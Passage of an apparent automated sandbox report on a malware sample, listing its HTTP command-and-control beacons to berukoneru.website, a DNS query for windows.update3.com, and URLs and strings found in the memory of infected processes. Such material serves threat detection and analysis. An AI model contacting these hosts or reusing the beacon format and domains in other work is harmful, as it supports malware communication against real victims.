Source: global traffic, HTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic, HTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown, Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown, Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown, Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown, Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown, Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655671376.0000000003335000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471079940.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.674023978.0000000003336000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.654149765.00000164EB229000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.667097557.00000164EB22A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000018.00000003.653604031.00000164EB3D9000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.555671260.00000164EB3D4000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoftq
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mic
          Source: powershell.exe, 00000018.00000002.669107613.00000164D2D91000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.651339407.000002DABC551000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
          Source: regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/
          Source: regsvr32.exe, 00000003.00000003.520125804.000000000330C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527683209.0000000003310000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf
          Source: regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
          Source: loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=e636&quot;
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/P
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/i
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom
          Source: unknownDNS traffic detected: queries for: windows.update3.com
          Source: global trafficHTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
